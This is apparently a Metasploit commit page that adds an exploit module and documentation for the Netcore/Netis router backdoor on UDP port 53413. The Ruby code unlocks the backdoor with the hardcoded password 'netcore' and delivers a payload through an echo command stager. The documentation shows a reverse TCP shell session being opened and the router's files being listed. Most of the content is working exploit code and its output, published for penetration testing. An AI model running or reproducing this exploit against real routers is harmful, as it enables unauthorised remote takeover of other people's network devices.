Browse Source

Land #6880, add a module for netcore/netdis udp 53413 backdoor

wchen-r7 3 years ago
parent
commit
8654baf3dd
No account linked to committer's email address

+ 94
- 0
documentation/modules/exploit/linux/misc/netcore_udp_53413_backdoor.md View File

@@ -0,0 +1,94 @@
1
+### Vulnerable Devices
2
+Trend Micro lists "almost all" models as being vulnerable in August 2014.
3
+
4
+Vulnerable AND Exploitable:
5
+
6
+1. Netcore NI360 second-generation
7
+ 
8
+Vulnerable, but not Exploitable via this module (details later):
9
+
10
+1. Netis WF2414 firmware V1.4.27001
11
+
12
+### Lab Emulation
13
+1. Install qemu
14
+2. Download and install mipsel.  Please read the [tutorial](https://people.debian.org/%7Eaurel32/qemu/mipsel/README.txt)
15
+3. Starts the mipsel lab
16
+ 1. `qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413`
17
+4. Put [vuln_squashfs-root.tar.gz](https://github.com/rapid7/metasploit-framework/files/267284/vuln_squashfs-root.tar.gz) to mipsel lab, extract it.
18
+ 1. `scp -P22222 vuln_squashfs-root.tar.gz root@127.0.0.1:/root`
19
+ 2. `tar xvf vuln_squashfs-root.tar.gz`
20
+5. Run vuln programs.
21
+ 1. `cd nw614 && chroot . /bin/igdmptd`
22
+
23
+## Verification Steps
24
+
25
+  1. Install the emulator/hardware
26
+  2. Start msfconsole
27
+  3. Do: `use exploits/linux/misc/netcore_udp_53413_backdoor`
28
+  4. Do: `set RHOST <ip>`
29
+  5. Do: `check`
30
+  6. Do: `exploit`
31
+  7. You should get a shell.
32
+
33
+## Exploitability
34
+
35
+As previously noted, some modules are vulnerable, but not currently exploitable via Metasploit.
36
+During [testing](https://github.com/rapid7/metasploit-framework/pull/6880#issuecomment-231597626) it was discovered that some modules implement an echo command that does not honor -ne.  While it may be possible to still execute a shell, further investigation would need to be conducted.
37
+In these cases, it should be possible to use [other scripts](https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py) to act as a fake interactive shell.
38
+
39
+## Scenarios
40
+
41
+The following is an example of a vulnerable AND EXPLOITABLE router.
42
+
43
+```
44
+use exploits/linux/misc/netcore_udp_53413_backdoor
45
+msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
46
+RHOST => 192.168.1.1
47
+msf exploit(netcore_udp_53413_backdoor) > check
48
+[+] The target is vulnerable.
49
+msf exploit(netcore_udp_53413_backdoor) > run
50
+
51
+[*] Started reverse TCP handler on 192.168.1.2:4444
52
+[*] Exploiting...
53
+[*] Command Stager progress -  12.54% done (196/1563 bytes)
54
+[*] Command Stager progress -  25.08% done (392/1563 bytes)
55
+[*] Command Stager progress -  37.62% done (588/1563 bytes)
56
+[*] Command Stager progress -  50.16% done (784/1563 bytes)
57
+[*] Command Stager progress -  62.70% done (980/1563 bytes)
58
+[*] Command Stager progress -  75.24% done (1176/1563 bytes)
59
+[*] Command Stager progress -  87.78% done (1372/1563 bytes)
60
+[*] Command Stager progress - 100.00% done (1563/1563 bytes)
61
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500
62
+
63
+pwd
64
+/
65
+ls
66
+bin
67
+cfg
68
+dev
69
+etc
70
+lib
71
+linuxrc
72
+log
73
+proc
74
+sbin
75
+sh
76
+sys
77
+tmp
78
+usr
79
+var
80
+web
81
+```
82
+
83
+The following is an example of a vulnerable but NOT expoitable router.
84
+
85
+```
86
+msf > use exploits/linux/misc/netcore_udp_53413_backdoor
87
+msf exploit(netcore_udp_53413_backdoor) > set rhost 192.168.1.1
88
+rhost => 192.168.1.1
89
+msf exploit(netcore_udp_53413_backdoor) > check
90
+
91
+[+] Backdoor Unlocked
92
+[*] Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.
93
+[*] The target service is running, but could not be validated.
94
+```

+ 123
- 0
modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb View File

@@ -0,0 +1,123 @@
1
+##
2
+# This module requires Metasploit: http://metasploit.com/download
3
+# Current source: https://github.com/rapid7/metasploit-framework
4
+##
5
+
6
+require 'msf/core'
7
+
8
+class MetasploitModule < Msf::Exploit::Remote
9
+  Rank = NormalRanking
10
+
11
+  include Msf::Exploit::Remote::Udp
12
+  include Msf::Exploit::CmdStager
13
+
14
+  def initialize(info = {})
15
+    super(update_info(info,
16
+      'Name'            => 'Netcore Router Udp 53413 Backdoor',
17
+      'Description'     => %q{
18
+        Routers manufactured by Netcore, a popular brand for networking
19
+        equipment in China, have a wide-open backdoor that can be fairly
20
+        easily exploited by attackers. These products are also sold under
21
+        the Netis brand name outside of China. This backdoor allows
22
+        cyber criminals to easily run arbitrary code on these routers,
23
+        rendering it vulnerable as a security device.
24
+        Some models include a non-standard echo command which doesn't
25
+        honor -e, and are therefore not currently exploitable with
26
+        Metasploit.  See URLs or module markdown for additional options.
27
+      },
28
+      'Author'          =>
29
+        [
30
+          'Nixawk',
31
+          'h00die <mike@shorebreaksecurity.com>'
32
+        ],
33
+      'License'         => MSF_LICENSE,
34
+      'References'      =>
35
+        [
36
+          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-90227' ],
37
+          [ 'URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/' ],
38
+          [ 'URL', 'https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py']
39
+        ],
40
+      'Privileged'      => true,
41
+      'Targets'         =>
42
+        [
43
+          ['MIPS Little Endian',
44
+           {
45
+             'Platform' => 'linux',
46
+             'Arch'     => ARCH_MIPSLE
47
+           }
48
+          ],
49
+          ['MIPS Big Endian',
50
+           {
51
+             'Platform' => 'linux',
52
+             'Arch'     => ARCH_MIPSBE
53
+           }
54
+          ]
55
+        ],
56
+      'DefaultTarget'   => 0,
57
+      'DisclosureDate'  => 'Aug 25 2014'))
58
+
59
+    register_options(
60
+      [
61
+        OptInt.new('TIMEOUT', [true, 'The socket response timeout in milliseconds', 1000]),
62
+        Opt::RPORT(53413)
63
+      ], self.class)
64
+  end
65
+
66
+  def timeout
67
+    (datastore['TIMEOUT'] || 1000) / 1000.0
68
+  end
69
+
70
+  def send_command(data)
71
+    payload = "\x00" * 8
72
+    payload << data
73
+    udp_sock.put(payload)
74
+  end
75
+
76
+  def execute_command(cmd, _opts)
77
+    send_command(cmd)
78
+    vprint_status("Sending: #{cmd}")
79
+  end
80
+
81
+  def authenticate()
82
+    # netcore is the password to unlock the backdoor
83
+    send_command('netcore')
84
+    resp = udp_sock.get(timeout)
85
+    if resp.include?('Login succeeded!')
86
+      vprint_good('Backdoor Unlocked')
87
+    end
88
+  end
89
+
90
+  def check
91
+    connect_udp
92
+    authenticate
93
+    resp = []
94
+    tmp_file = Rex::Text.rand_text_alpha(5)
95
+    # we need to test the echo command to see if it plays nice
96
+    ["echo -en #{tmp_file} > /tmp/#{tmp_file}", "cat /tmp/#{tmp_file}"].each do |command|
97
+      send_command(command)
98
+      resp << udp_sock.get(timeout)
99
+    end
100
+    disconnect_udp
101
+    resp_str = resp.join(',')
102
+    # check if we got a good response back
103
+    if resp.length >= 1 && resp_str.include?("\x00\x00\x00\x05") && resp_str.include?(tmp_file)
104
+      # some routers have a non-standard echo which doesn't support -en, so we need to detect that
105
+      if resp_str.include?('en ')
106
+        print_status('Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.')
107
+        Exploit::CheckCode::Detected
108
+      else
109
+        Exploit::CheckCode::Vulnerable
110
+      end
111
+    else
112
+      Exploit::CheckCode::Safe
113
+    end
114
+  end
115
+
116
+  def exploit
117
+    print_status('Exploiting...')
118
+    connect_udp
119
+    authenticate
120
+    execute_cmdstager(:flavor => :echo, :linemax => 200)
121
+    disconnect_udp
122
+  end
123
+end

Loading…
Cancel
Save